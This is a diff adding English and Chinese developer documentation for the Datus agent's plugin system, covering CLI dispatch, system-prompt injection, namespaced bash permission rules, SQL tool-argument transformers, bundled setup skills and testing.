+        if not profiles:
+            # Installed but unconfigured: point the agent at the setup
+            # skill instead of disappearing from the prompt.
+            return (
+                "## Hello (installed, not configured)\n"
+                "The `datus hello` CLI is installed but has no environment "
+                "configured.\nRun the `hello-setup` skill to configure one."
+            )
+        envs = "\n".join(
+            f"- {name}: {cfg.get('greeting', '?')}"
+            for name, cfg in profiles.items()
+        )
+        return (
+            "## Hello\n"
+            "Say hello via `datus hello <name>`.\n"
+            f"Environments ({len(profiles)}):\n{envs}"
+        )
+```
+
+Datus passes the plugin's **full** profile mapping (all environments, not just
+the active one) and appends the returned markdown to the system prompt of every
+agentic node. An installed-but-unconfigured plugin receives `{}` — return a
+short "installed, not configured" note pointing at your bundled setup skill
+(see below) so the agent can walk the user through configuration. Return
+`None` only when there is truly nothing to say.
+
+When at least one plugin contributes a section, Datus prepends its own
+`## Plugins` preamble naming the loaded config file and the
+`agent.plugins.<plugin>.<profile>` shape — your text never needs to hard-code
+config paths.
+
+!!! danger "Never surface secrets"
+    The returned text enters the LLM context. Datus hands you the full profile
+    dicts — which include `password`, secret keys, access keys — but you must
+    emit **only non-secret fields** (endpoints, region, environment names).
+    Datus never splices profile values itself; keeping credentials out of the
+    prompt is the plugin's responsibility. Use a field allow-list.
+
+## CLI bash permissions
+
+When the **agent** (not a human) runs your CLI through its bash tool — e.g. the
+model decides to execute `datus hello greet Ada` — the command goes through
+Datus' permission layer. Without a declaration, every such command prompts the
+user for confirmation. A class-level `cli_permissions()` lets your plugin
+declare, per permission profile, which of its subcommands are safe to auto-run
+(`allow`), which must be confirmed (`ask`), and which are blocked (`deny`):
+
+```python
+class HelloPlugin:
+    @classmethod
+    def cli_permissions(cls):
+        return {
+            "normal": {"allow": ["greet:*"], "ask": ["config set:*"]},
+            "auto":   {"allow": ["greet:*", "config set:*"]},
+        }
+```
+
+Semantics:
+
+- **Patterns are relative to your namespace.** Datus prefixes each pattern
+  with `datus <name> `, so `greet:*` becomes `datus hello greet:*`. A plugin
+  can never affect commands outside `datus <name>` — not `rm`, not another
+  plugin.
+- **Pattern syntax** matches `permissions.bash_commands` in `agent.yml`:
+  `cmd` is an exact match, `cmd:*` a prefix match, `cmd:glob` a prefix match
+  whose first argument must satisfy the glob (e.g. `greet:A*`). A bare `:*`
+  covers the whole namespace.
+- **Profile keys**: only `normal` and `auto` are accepted. The `dangerous`
+  profile ignores all command-level bash rules by design; a `dangerous` key is
+  warned about and dropped.
+- **Users always win.** A user `deny` rule in `agent.yml` overrides a plugin
+  `allow` (deny > ask > allow, regardless of declaration order), and plugin
+  declarations can never change a profile's default posture.
+- **`ask` rules can be relaxed per project.** When the agent hits one of your
+  `ask` subcommands, the confirmation prompt offers "allow (project)" —
+  choosing it persists the exact matched pattern (e.g.
+  `datus hello config set:*`) to the project's `.datus/config.yml`
+  `bash_allow` list, and that subcommand auto-runs from then on. The grant is
+  exact-match only: it never widens to the rest of your namespace, and your
+  `deny` rules are unaffected. (User-authored `ask` rules from `agent.yml` do
+  not get this option — relaxing those belongs in the user's own config.)
+- **Scope**: only the agent's bash tool is gated. A human typing
+  `datus hello ...` in a terminal is never affected. `plugins_enabled: false`
+  disables collection along with the rest of the plugin system (see the
+  [introduction](introduction.md#disabling-the-plugin-system)).
+- **`--profile` is transparent to matching.** `datus hello --profile prod
+  config set x` matches the same rules (and the same project grants) as the
+  unqualified form — the leading datus-global flag is normalized away before
+  evaluation. `--config <path>` is deliberately *not* normalized: pointing
+  datus at a different config file rebinds credentials, so those invocations
+  always fall back to a confirmation.
+- Malformed declarations (wrong types, unknown keys, empty patterns) are
+  logged and skipped — they never break Datus startup.
+
+Declare read-only subcommands as `allow` and state-changing ones as `ask`
+under `normal`; promote routine state changes to `allow` under `auto` only
+when re-running them is harmless.
+
+## Tool argument transformers
+
+A class-level `tool_transformers()` lets your plugin intercept the **agent's
+tool calls** — inspect and rewrite the arguments before the tool executes, or
+deny the call outright. The canonical use case is SQL policy enforcement:
+append a tenant-scope predicate to every `execute_sql` query, using the
+request principal the deployment injects.
+
+```python
+class ScopedSqlPlugin:
+    @classmethod
+    def tool_transformers(cls):
+        return {"db_tools.execute_sql": enforce_tenant_scope}
+
+
+def enforce_tenant_scope(tool_name, args, context):
+    tenant_id = (context.get("principal") or {}).get("tenant", {}).get("id")
+    if not tenant_id:
+        raise PermissionError("missing principal.tenant.id; cannot scope query")
+    args["sql"] = add_where_predicate(args["sql"], f"tenant_id = '{tenant_id}'")
+    return args
+```
+
+Semantics:
+
+- **Declaration shape**: a dict mapping tool patterns to a transformer or a
+  list of transformers. Patterns use the proxy syntax — a bare tool name
+  (`execute_sql`), or `category.method` with fnmatch globs (`db_tools.*`).
+- **Transformer signature**: `transformer(tool_name, args, context) -> dict`,
+  sync or async. Return the (possibly modified) argument dict to continue.
+  **Raise to deny**: the tool never runs and the model receives your
+  exception message as a normal tool failure. Returning anything that is not
+  a dict also denies, fail closed.
+- **`context`** is a plain dict with `node_name`, `principal` (request-scoped
+  caller attributes, empty when the deployment sets none), `project_root`,
+  and `agent_config` (the live agent configuration object — read your own
+  profile via `context["agent_config"].get_plugin_profile("<name>")`; access
+  it duck-typed, never import `datus.*` for it). It is rebuilt on every call,
+  so per-request values are always fresh.
+- **Coverage**: transformers wrap the agent's `FunctionTool` layer, which
+  both execution paths (SDK Runner and the native loop) go through. They do
+  **not** cover direct Python invocations of tool methods (e.g.
+  reference-template execution) or tools proxied to an external client —
+  server-side enforcement that must survive those paths belongs in the tool
+  layer itself (see `agent.sql_policy`).
+- **Trust model**: transformers run in-process with full access to every
+  matched tool call's arguments. They are trusted code, gated by the same
+  `plugins_enabled` master switch as the rest of the plugin surface.
+- Use a SQL parser or a database-safe query builder when rewriting SQL —
+  never string concatenation for policy predicates.
+- Malformed declarations (non-dict, non-callable entries, empty patterns)
+  are logged and skipped — they never break Datus startup. A declaration
+  that collects successfully but fails to apply aborts the agent node
+  instead of silently running without enforcement.
+
+## Bundling a setup skill
+
+Editing YAML by hand is the main friction after `pip install`. Ship a
+`<name>-setup` skill next to your main skill so the agent can collect the
+values and write the profile itself:
+
+```
+datus_plugin_hello/
+└── skills/
+    ├── hello/
+    │   └── SKILL.md
+    └── hello-setup/
+        └── SKILL.md
+```
+
+The setup `SKILL.md` should cover, in order:
+
+1. **When to use** — the plugin is unconfigured, or the user wants another
+   environment.
+2. **Config structure** — a complete YAML template for
+   `agent.plugins.<name>.<profile>`, with comments marking required / optional
+   / secret fields.
+3. **Ask the user** — list the fields that must come from the user (endpoint,
+   auth choice, ...). For secrets, instruct the agent to have the user export
+   an environment variable and reference it as `${VAR}` in the YAML — never
+   write literal secrets to the file.
+4. **Write the config** — into the file named by the `## Plugins` prompt
+   preamble, marking the first profile `default: true`.
+5. **Verify** — a cheap read-only command (e.g. `datus hello version`).
+   `datus <plugin>` reloads the config on every invocation, so the profile
+   works immediately; the prompt's environment list refreshes next session.
+
+Add a guard note: if the current environment cannot edit the config file
+(API / VSCode / web deployment), the agent should tell the user to edit
+`agent.yml` on the server instead.
+
+A complete minimal `hello-setup/SKILL.md`:
+
+````markdown
+---
+name: hello-setup
+description: Configure an environment profile for the `datus hello` plugin
+---
+
+# Hello Setup
+
+Use this skill when `datus hello` is installed but has no configured
+environment, or when the user wants to add another one.
+
+## Config structure
+
+Profiles live under `agent.plugins.hello.<profile>` in the config file named
+by the `## Plugins` section of the system prompt:
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true            # mark the first profile as default
+        greeting: Hi             # required
+        token: ${HELLO_TOKEN}    # secret — reference an env var, never a literal
+```
+
+## Steps
+
+1. Ask the user for `greeting` and which environment variable holds the
+   token. Have the user export the variable; write `${VAR}` into the YAML —
+   never a literal secret.
+2. Write the profile into the config file above; mark the first profile
+   `default: true`.
+3. Verify with a cheap read-only call: `datus hello Ada`.
+
+If this environment cannot edit the config file (API / web deployment), tell
+the user to edit `agent.yml` on the server instead.
+````
+
+## Verifying your plugin end-to-end
+
+After `pip install -e`, each surface can be checked without restarting
+anything (plugins are discovered per invocation):
+
+- **CLI dispatch** — run `datus <name> ...` from any directory. If it falls
+  through to the REPL instead, the entry point is missing or misnamed; check
+  `pip show -f your-package` for the `entry_points.txt`.
+- **Skills** — start `datus` and run `/skill list`; plugin-bundled skills
+  appear alongside project and user skills.
+- **Prompt injection** — the easiest check is a unit test calling
+  `system_prompt()` directly (next section). To confirm it lands in a live
+  session, start `datus` and ask the agent "which plugins are configured?" —
+  the answer comes from the injected section. Note that config edits take
+  effect on the next `datus <plugin>` invocation immediately, but the prompt
+  section refreshes only on the next session.
+
+## Testing your plugin
+
+Because Datus is the broker, unit tests construct your plugin with a plain dict
+— no `agent.yml`, no Datus imports:
+
+```python
+from datus_plugin_hello.plugin import HelloPlugin
+
+def test_run_cli_uses_profile_greeting(capsys):
+    rc = HelloPlugin(profile={"name": "prod", "greeting": "Hi"}).run_cli(["Ada"])
+    assert rc == 0
+    assert "Hi, Ada!" in capsys.readouterr().out
+
+def test_system_prompt_lists_envs_without_secrets():
+    text = HelloPlugin.system_prompt({
+        "prod": {"name": "prod", "greeting": "Hi", "token": "s3cr3t"},
+    })
+    assert "## Hello" in text
+    assert "s3cr3t" not in text          # secrets must never leak
+
+def test_system_prompt_unconfigured_points_to_setup_skill():
+    text = HelloPlugin.system_prompt({})
+    assert "not configured" in text
+    assert "hello-setup" in text
+```
+
+## Constraints checklist
+
+Before publishing, verify:
+
+- [ ] The package does **not** `import datus` anywhere (`grep -rn "import datus" your_pkg/`).
+- [ ] The package does **not** depend on `datus` or a shared plugin SDK in `pyproject.toml`.
+- [ ] `__init__` accepts the profile as a keyword argument named `profile` (Datus calls `PluginClass(profile=...)`).
+- [ ] The entry-point name is not a reserved name (`upgrade`, `skill`) and does not start with `-`.
+- [ ] `skills_dir`, `system_prompt`, and `cli_permissions` are class-reachable (`@classmethod` / `@staticmethod` / class attribute).
+- [ ] `system_prompt` emits only non-secret fields.
+- [ ] `cli_permissions` patterns are namespace-relative (no `datus <name>` prefix — Datus adds it), and state-changing subcommands are `ask` under `normal`.
+- [ ] `run_cli` returns an int (or `None`) and does not call `sys.exit()` on the success path.
+- [ ] Skill files are packaged into the wheel.
+- [ ] The `datus.plugins` entry-point name matches the intended `datus <name>` command and the `agent.plugins.<name>` config key.
+
+## Reference
+
+- **Entry-point group**: `datus.plugins` — one entry per plugin, resolving to a plugin **class**.
+- **Contract source of truth**: `datus/plugins/base.py` (documented `DatusPlugin` protocol).
+- **Related**: [Plugin Introduction](introduction.md), [Skills](../skills/introduction.md).

--- a/docs/plugin/development.zh.md
+++ b/docs/plugin/development.zh.md
@@ -1,0 +1,639 @@
+# Plugin 开发
+
+本指南讲解如何开发一个 Datus plugin:从一个最小可用的 `hello` 命令出发,逐步覆盖
+完整契约。关于 plugin 是什么、用户如何安装配置、profile 如何解析,请先阅读
+[介绍](introduction.zh.md)。
+
+plugin 是一个可安装的 Python 包,通过 `datus.plugins` entry-point 组被发现。
+最关键的约束:**plugin 绝不 `import datus.*`,也不依赖任何共享 SDK**。契约只是一小组
+Datus 按结构调用的方法名(鸭子类型)。Datus 是 *配置 broker*——它负责读 `agent.yml`、
+展开 `${VAR}`、解析激活 profile,用一个普通 `dict` 构造你的 plugin 并调用它。你只需实现方法。
+
+## 前置条件
+
+- 一个能安装到与 `datus` 同一环境的 Python 包。
+- 已安装 `datus`(`pip install datus-agent` 或源码 checkout)。
+- Python 3.12+——plugin 运行在 datus 自己的解释器里(`datus-agent` 声明
+  `requires-python >= 3.12`),你的代码和依赖必须与之兼容。
+
+## 快速开始:最小 plugin
+
+一个 plugin 就是注册在 `datus.plugins` 下的一个类。下面是最小可用示例——一个 `hello` 命令。
+
+**1. 包结构**
+
+```
+datus-plugin-hello/
+├── pyproject.toml
+└── datus_plugin_hello/
+    ├── __init__.py
+    └── plugin.py
+```
+
+**2. plugin 类**(`datus_plugin_hello/plugin.py`)
+
+```python
+from __future__ import annotations
+
+from typing import Any, Dict, List, Optional
+
+
+class HelloPlugin:
+    def __init__(self, profile: Optional[Dict[str, Any]] = None) -> None:
+        # `profile` 是解析好的 agent.plugins.hello.<profile> 字典
+        # (已由 datus 完成 ${VAR} 展开)。空字典也没问题。
+        self.profile: Dict[str, Any] = profile or {}
+
+    def run_cli(self, argv: List[str]) -> int:
+        greeting = self.profile.get("greeting", "Hello")
+        name = argv[0] if argv else "world"
+        print(f"{greeting}, {name}!")
+        return 0
+```
+
+**3. 注册 entry-point**(`pyproject.toml`)
+
+```toml
+[project]
+name = "datus-plugin-hello"
+version = "0.1.0"
+dependencies = []                      # 注意:不要依赖 datus
+
+[project.entry-points."datus.plugins"]
+hello = "datus_plugin_hello.plugin:HelloPlugin"
+```
+
+CLI 命令名(`datus hello`)和配置键(`agent.plugins.hello`)**只由 entry-point
+名(`hello`)决定**——类名和模块结构随意。有两个名字是**保留字**,永远不会分发给
+plugin:`upgrade` 和 `skill`,注册成这两个名字的 plugin 会静默失效;以 `-` 开头的
+名字也无法被分发。
+
+**4. 安装并运行**
+
+```bash
+pip install -e datus-plugin-hello
+datus hello Ada          # -> Hello, Ada!
+```
+
+这就是一个完整的 plugin。下面的内容都是可选的扩展面。
+
+## 契约
+
+Datus 在 entry-point 解析出的类上**按方法名**调用下列成员。你的类不导入、不继承 Datus 的任何东西。
+
+| 成员 | 形态 | 用途 |
+|---|---|---|
+| `PluginClass(profile: dict)` | 构造函数 | Datus 以**关键字参数**方式传入解析好的 `agent.plugins.<name>.<profile>` 字典(已展开环境变量)——即 `PluginClass(profile=...)`,因此参数必须命名为 `profile`。config-free plugin 可忽略其值。 |
+| `run_cli(self, argv: list[str]) -> int \| None` | 实例方法 | 执行子命令。`argv` 是 `datus <plugin>` 之后的全部参数(Datus 自己的 `--profile`/`--config` 已剥离)。返回退出码,`None` 视为 `0`。 |
+| `skills_dir() -> str \| None` | **可选**,类级 | 返回打包的 skill 目录。见[打包 skill](#skill)。 |
+| `system_prompt(profiles: dict[str, dict]) -> str \| None` | **可选**,类级 | 返回注入 system prompt 的 markdown 段。见[注入 system prompt](#system-prompt)。 |
+| `cli_permissions() -> dict \| None` | **可选**,类级 | 按权限 profile 声明本 plugin CLI 命名空间内的 bash 权限规则。见 [CLI bash 权限](#cli-permissions)。 |
+| `tool_transformers() -> dict \| None` | **可选**,类级 | 声明工具参数 transformer,在 agent 的工具调用执行前改写参数或拒绝调用。见 [工具参数 transformer](#tool-transformers)。 |
+
+!!! warning "`skills_dir` 与 `system_prompt` 必须类级可取"
+    Datus 在**启动期、无激活 profile** 时就解析这两者(skill 发现和 prompt 构建都发生在
+    任何命令执行之前)。请声明为 `@classmethod` / `@staticmethod`(`skills_dir` 也可以是普通类属性)——
+    它们不能依赖 `__init__`。
+
+## 配置:Datus 交给你什么
+
+用户在 `agent.plugins.<name>` 下配置你的 plugin,`<name>` 之下的每个键是一个
+**profile**(一套环境):
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true
+        greeting: Hi
+        token: ${HELLO_TOKEN}      # 密钥优先用 ${ENV_VAR}
+      staging:
+        greeting: Yo
+```
+
+Datus 把它解析成 `agent.plugins.<name>.<profile> -> dict`,**逐 profile 展开 `${VAR}`**,
+并注入一个等于 profile 名的 `name` 键。哪个 profile 字典进入你的构造函数由 Datus
+决定——显式 `--profile`、项目 pin、`default: true`、唯一 profile,或在完全未配置时
+的空字典。完整解析顺序见[介绍](introduction.zh.md#which-profile-runs);这些逻辑你一行
+都不用写,构造函数只管接收解析好的 `dict`。
+
+本地测试时,把 profile 写进你的 datus 会话实际加载的那个 config 文件
+(显式 `--config` → `./conf/agent.yml` → `~/.datus/conf/agent.yml`)。
+
+## 实现 `run_cli`
+
+`argv` 是剥离了 Datus 全局参数后的命令尾部:
+
+```
+datus hello --profile staging greet Ada
+                └── 已剥离 ──┘ └── argv = ["greet", "Ada"] ──┘
+```
+
+只有出现在**第一个非选项 token 之前**的 `--profile` / `--config` 会被当作 Datus
+全局参数消费;从第一个命令 token 起,后面的一切都属于 plugin。因此
+`datus hello greet --profile staging` 会把 `["greet", "--profile", "staging"]`
+原样传给你——你的子命令完全可以定义自己的 `--profile` 选项。
+
+返回整数退出码。建议采用的约定:
+
+| 退出码 | 含义 |
+|---|---|
+| `0` | 成功 |
+| `1` | 运行时错误 |
+| `2` | 用法错误 |
+| `3` | 配置错误 |
+| `8` | 缺少可选依赖 |
+
+抛异常也可以——Datus 会捕获 `run_cli` 抛出的异常并映射为退出码 `1`,不会让 CLI 崩溃——
+但返回明确的退出码能给用户更清晰的信号。
+
+## 食谱:把函数/API 快速封装成 CLI
+
+`run_cli` 收到的是原始 `argv` 列表,所以你可以任意路由。下面是四种常见模式,从最快到最完善。
+
+### A. 字典分发 —— 几个函数,零依赖
+
+暴露少量函数最快的方式:用第一个 token 映射到 handler,每个 handler 拿到 `argv` 剩余部分。
+
+```python
+class ToolboxPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        if not argv:
+            print("usage: datus toolbox <add|upper> ...")
+            return 2
+        cmd, rest = argv[0], argv[1:]
+        handlers = {"add": self._add, "upper": self._upper}
+        handler = handlers.get(cmd)
+        if handler is None:
+            print(f"unknown command: {cmd}")
+            return 2
+        return handler(rest)
+
+    def _add(self, args):          # datus toolbox add 1 2 3
+        print(sum(float(a) for a in args))
+        return 0
+
+    def _upper(self, args):        # datus toolbox upper hello
+        print(" ".join(args).upper())
+        return 0
+```
+
+### B. argparse —— 带类型的参数、开关、自动 usage/`-h`
+
+标准库,无额外依赖。`argparse` 在 `-h` 或用法错误时会打印用法并抛 `SystemExit`;
+Datus 会把它作为退出码透出(`-h` 为 0,用法错误为 2),这正是 CLI 的惯例行为。
+
+```python
+import argparse
+
+class ToolboxPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        parser = argparse.ArgumentParser(prog="datus toolbox")
+        sub = parser.add_subparsers(dest="cmd", required=True)
+
+        p_add = sub.add_parser("add", help="sum numbers")
+        p_add.add_argument("nums", nargs="+", type=float)
+
+        p_grep = sub.add_parser("grep", help="filter lines in a file")
+        p_grep.add_argument("pattern")
+        p_grep.add_argument("path")
+        p_grep.add_argument("-i", "--ignore-case", action="store_true")
+
+        ns = parser.parse_args(argv)      # -h / 用法错误时抛 SystemExit
+        if ns.cmd == "add":
+            print(sum(ns.nums))
+            return 0
+        if ns.cmd == "grep":
+            return self._grep(ns.pattern, ns.path, ns.ignore_case)
+
+    def _grep(self, pattern, path, ignore_case):
+        needle = pattern.lower() if ignore_case else pattern
+        with open(path, encoding="utf-8") as fh:
+            for line in fh:
+                hay = line.lower() if ignore_case else line
+                if needle in hay:
+                    print(line.rstrip())
+        return 0
+```
+
+### C. 封装 REST API
+
+从 profile 里读端点和凭据(Datus 已展开 `${VAR}`),再把子命令映射到请求。
+凭据保留在 profile 中——绝不硬编码,也绝不回显。
+
+```python
+import argparse
+import json
+
+class PetstorePlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        import requests  # plugin 可以依赖自己的库
+
+        base = self.profile.get("api_base_url")
+        if not base:
+            print("no api_base_url configured for the profile")
+            return 3
+        headers = {}
+        if self.profile.get("token"):
+            headers["Authorization"] = f"Bearer {self.profile['token']}"
+
+        parser = argparse.ArgumentParser(prog="datus petstore")
+        sub = parser.add_subparsers(dest="cmd", required=True)
+        sub.add_parser("list-pets")
+        p_get = sub.add_parser("get-pet")
+        p_get.add_argument("id")
+        ns = parser.parse_args(argv)
+
+        base = base.rstrip("/")
+        if ns.cmd == "list-pets":
+            resp = requests.get(f"{base}/pets", headers=headers, timeout=30)
+        else:
+            resp = requests.get(f"{base}/pets/{ns.id}", headers=headers, timeout=30)
+
+        if resp.status_code >= 400:
+            print(f"error {resp.status_code}: {resp.text}")
+            return 1
+        print(json.dumps(resp.json(), indent=2))
+        return 0
+```
+
+对应配置:
+
+```yaml
+agent:
+  plugins:
+    petstore:
+      prod:
+        default: true
+        api_base_url: https://api.example.com/v1
+        token: ${PETSTORE_TOKEN}
+```
+
+### D. Typer / Click —— 最完善的体验,一个额外依赖
+
+命令面较大时,[Typer](https://typer.tiangolo.com/) 这类框架能自动给你帮助文本、
+类型转换和补全。由于 Datus 每次调用都会重新构造你的 plugin,而 Typer app 是模块级对象,
+需要通过一个模块全局变量把激活 profile 暴露给各命令读取。
+
+```python
+import typer
+
+app = typer.Typer(add_completion=False)
+_ACTIVE_PROFILE: dict = {}
+
+
+@app.command("greet")
+def greet(name: str, loud: bool = False):
+    greeting = _ACTIVE_PROFILE.get("greeting", "Hello")
+    msg = f"{greeting}, {name}!"
+    print(msg.upper() if loud else msg)
+
+
+class GreeterPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        global _ACTIVE_PROFILE
+        _ACTIVE_PROFILE = self.profile
+        try:
+            # standalone_mode=False 阻止 Click 自行 sys.exit,
+            # 这样我们能返回退出码,并始终清理 profile。
+            app(args=argv, standalone_mode=False)
+            return 0
+        except SystemExit as exc:      # -h / 用法
+            return int(exc.code or 0)
+        except typer.Exit as exc:
+            return exc.exit_code
+        finally:
+            _ACTIVE_PROFILE = {}
+```
+
+把 `typer` 加进你的包 `dependencies`(plugin 的依赖是它自己的——只是别依赖 `datus`)。
+
+## 打包 skill {#skill}
+
+如果你的包附带 skill 目录,通过类级 `skills_dir()` 暴露它,Datus 会在启动期发现这些 skill
+(它们会出现在 `/skill list`,与项目、用户 skill 并列)。
+
+```python
+class HelloPlugin:
+    @classmethod
+    def skills_dir(cls) -> str:
+        from pathlib import Path
+        return str(Path(__file__).parent / "skills")
+```
+
+目录结构与打包:
+
+```
+datus_plugin_hello/
+└── skills/
+    └── hello/
+        └── SKILL.md
+```
+
+最小的 `SKILL.md` 由 YAML frontmatter 加 markdown 指令组成(frontmatter 遵循
+Skills 系统采用的 [agentskills.io](https://agentskills.io) 规范):
+
+```markdown
+---
+name: hello
+description: Say hello to someone via the `datus hello` CLI
+---
+
+# Hello
+
+Run `datus hello <name>` to greet someone. ...
+```
+
+完整的 frontmatter 字段参考见 [Skills](../skills/introduction.zh.md) 文档。
+
+确保 skill 文件被打进 wheel(它们是数据文件,不是 Python 模块)。Hatchling 默认
+会打包包目录下的所有文件,除非文件被 VCS ignore(此时需列进
+`[tool.hatch.build.targets.wheel] artifacts`),否则无需额外配置。setuptools
+则必须显式声明:
+
+```toml
+[tool.setuptools.package-data]
+datus_plugin_hello = ["skills/**/*"]
+```
+
+构建后用 `unzip -l dist/*.whl | grep SKILL.md` 验证。
+
+## 注入 system prompt {#system-prompt}
+
+plugin 可以在对话一开始就告诉 agent:自己是什么、配了哪些环境——让模型主动选用,而不是盲猜。
+通过类级 `system_prompt(profiles)` 暴露:
+
+```python
+class HelloPlugin:
+    @classmethod
+    def system_prompt(cls, profiles):
+        if not profiles:
+            # 已安装但未配置:指向 setup skill,而不是从 prompt 里消失。
+            return (
+                "## Hello (installed, not configured)\n"
+                "The `datus hello` CLI is installed but has no environment "
+                "configured.\nRun the `hello-setup` skill to configure one."
+            )
+        envs = "\n".join(
+            f"- {name}: {cfg.get('greeting', '?')}"
+            for name, cfg in profiles.items()
+        )
+        return (
+            "## Hello\n"
+            "Say hello via `datus hello <name>`.\n"
+            f"Environments ({len(profiles)}):\n{envs}"
+        )
+```
+
+Datus 传入该 plugin 的**全部** profile 映射(所有环境,不只激活的那个),并把返回的 markdown
+追加到每个 agentic 节点的 system prompt。**已安装但未配置**的 plugin 会收到 `{}`——此时应返回
+一段简短的"已安装,未配置"提示,指向自带的 setup skill(见下一节),让 agent 能引导用户完成配置。
+只有确实无话可说时才返回 `None`。
+
+只要有任一 plugin 贡献了内容,Datus 会在这些片段前面加上自己的 `## Plugins` 前导块,写明实际
+加载的 config 文件位置与 `agent.plugins.<plugin>.<profile>` 结构——你的文本无需硬编码任何路径。
+
+!!! danger "绝不暴露密钥"
+    返回文本会进入 LLM 上下文。Datus 交给你的是完整 profile 字典——其中含 `password`、
+    secret、access key——但你只能输出**非敏感字段**(endpoint、region、环境名)。
+    Datus 从不自行拼接 profile 值;把凭据挡在 prompt 之外是 plugin 的责任。请用字段白名单。
+
+## CLI bash 权限 {#cli-permissions}
+
+当 **agent**(而非人类用户)通过它的 bash 工具执行你的 CLI——例如模型自主决定运行
+`datus hello greet Ada`——命令会经过 Datus 的权限层。若无任何声明,这类命令每次都会
+弹出确认。类级 `cli_permissions()` 让 plugin 按权限 profile 声明:哪些子命令可以直接
+放行(`allow`)、哪些必须确认(`ask`)、哪些直接拦截(`deny`):
+
+```python
+class HelloPlugin:
+    @classmethod
+    def cli_permissions(cls):
+        return {
+            "normal": {"allow": ["greet:*"], "ask": ["config set:*"]},
+            "auto":   {"allow": ["greet:*", "config set:*"]},
+        }
+```
+
+语义:
+
+- **pattern 相对于你的命名空间。** Datus 会给每条 pattern 加上 `datus <name> ` 前缀,
+  `greet:*` 实际生效为 `datus hello greet:*`。plugin 永远无法影响 `datus <name>`
+  之外的命令——碰不到 `rm`,也碰不到其他 plugin。
+- **pattern 语法**与 `agent.yml` 的 `permissions.bash_commands` 一致:`cmd` 精确匹配,
+  `cmd:*` 前缀匹配,`cmd:glob` 前缀匹配且第一个参数需满足 glob(如 `greet:A*`)。
+  单写 `:*` 表示覆盖整个命名空间。
+- **profile 键**:只接受 `normal` 与 `auto`。`dangerous` profile 设计上忽略一切
+  命令级 bash 规则,声明 `dangerous` 键会被告警并丢弃。
+- **用户永远优先。** `agent.yml` 里用户的 `deny` 规则压过 plugin 的 `allow`
+  (无论声明顺序,判定固定为 deny > ask > allow),且 plugin 声明永远改不了
+  profile 的默认姿态。
+- **`ask` 规则可按项目放宽。** agent 命中你声明的 `ask` 子命令时,确认框会提供
+  "allow (project)" 选项——选择后把命中的 pattern 原样(如
+  `datus hello config set:*`)持久化到项目 `.datus/config.yml` 的 `bash_allow`
+  列表,此后该子命令直接放行。授权是精确匹配:不会扩大到命名空间的其他部分,
+  你的 `deny` 规则也不受影响。(用户自己写在 `agent.yml` 里的 `ask` 规则没有
+  这个选项——放宽自己的姿态应该改自己的配置。)
+- **作用范围**:只管 agent 的 bash 工具。人类在终端直接敲 `datus hello ...` 不受
+  任何影响。`plugins_enabled: false` 会连同 plugin 系统一起停用规则收集
+  (见[介绍](introduction.zh.md#disabling-the-plugin-system))。
+- **`--profile` 对匹配透明。** `datus hello --profile prod config set x` 与
+  不带该旗标的形式命中同样的规则(和同样的项目授权)——前导的 datus 全局旗标
+  会在判定前被归一化掉。`--config <path>` 有意*不*归一化:指向另一个配置文件
+  等于换绑凭据,这类调用一律回落到确认。
+- 声明格式有误(类型不对、未知键、空 pattern)只会记日志并跳过,绝不会影响
+  Datus 启动。
+
+建议:只读子命令在 `normal` 下声明为 `allow`,会改状态的声明为 `ask`;仅当重复执行
+无害时,才在 `auto` 下把常规状态变更提升为 `allow`。
+
+## 工具参数 transformer {#tool-transformers}
+
+类级 `tool_transformers()` 让 plugin 拦截 **agent 的工具调用**——在工具执行前检查并
+改写参数,或者直接拒绝这次调用。典型用例是 SQL 策略:给每条 `execute_sql` 查询
+追加租户作用域谓词,值来自部署侧注入的请求 principal。
+
+```python
+class ScopedSqlPlugin:
+    @classmethod
+    def tool_transformers(cls):
+        return {"db_tools.execute_sql": enforce_tenant_scope}
+
+
+def enforce_tenant_scope(tool_name, args, context):
+    tenant_id = (context.get("principal") or {}).get("tenant", {}).get("id")
+    if not tenant_id:
+        raise PermissionError("missing principal.tenant.id; cannot scope query")
+    args["sql"] = add_where_predicate(args["sql"], f"tenant_id = '{tenant_id}'")
+    return args
+```
+
+语义:
+
+- **声明形状**:dict,键为工具 pattern,值为单个 transformer 或 transformer 列表。
+  pattern 使用 proxy 语法——裸工具名(`execute_sql`),或带 fnmatch glob 的
+  `category.method`(`db_tools.*`)。
+- **transformer 签名**:`transformer(tool_name, args, context) -> dict`,同步或
+  异步均可。返回(可能已修改的)参数 dict 则继续执行。**抛异常即拒绝**:工具
+  不会执行,模型收到你的异常消息(以普通工具失败的形式)。返回非 dict 同样
+  按拒绝处理,fail-closed。
+- **`context`** 是普通 dict,含 `node_name`、`principal`(请求级调用方属性,
+  部署未注入时为空)、`project_root` 与 `agent_config`(运行中的 agent 配置
+  对象——通过 `context["agent_config"].get_plugin_profile("<name>")` 读取
+  自己的 profile;只做鸭子类型访问,不要为此 import `datus.*`)。每次调用
+  都会重建,请求级数据永远是新鲜的。
+- **覆盖范围**:transformer 包装的是 agent 的 `FunctionTool` 层,两条执行路径
+  (SDK Runner 与 native loop)都经过它。但它**不覆盖**对工具方法的 Python
+  直接调用(如 reference-template 执行),也不覆盖代理给外部客户端执行的工具——
+  必须在这些路径上也生效的服务端强制,应放在工具层本身(见 `agent.sql_policy`)。
+- **信任模型**:transformer 在进程内运行,能看到所有命中工具调用的完整参数,
+  属于受信代码;与 plugin 系统其余表面一样受 `plugins_enabled` 总开关门控。
+- 改写 SQL 时请使用 SQL parser 或数据库安全的查询构造器——策略谓词绝不要用
+  字符串拼接。
+- 声明格式有误(非 dict、非 callable 条目、空 pattern)只会记日志并跳过,绝不
+  影响 Datus 启动。但收集成功后应用失败会直接中止 agent 节点,而不是在丢失
+  强制的情况下静默运行。
+
+## 自带 setup skill {#setup-skill}
+
+`pip install` 之后手工改 YAML 是最大的使用摩擦。在主 skill 旁边再带一个 `<name>-setup`
+skill,让 agent 替用户收集配置并写入 profile:
+
+```
+datus_plugin_hello/
+└── skills/
+    ├── hello/
+    │   └── SKILL.md
+    └── hello-setup/
+        └── SKILL.md
+```
+
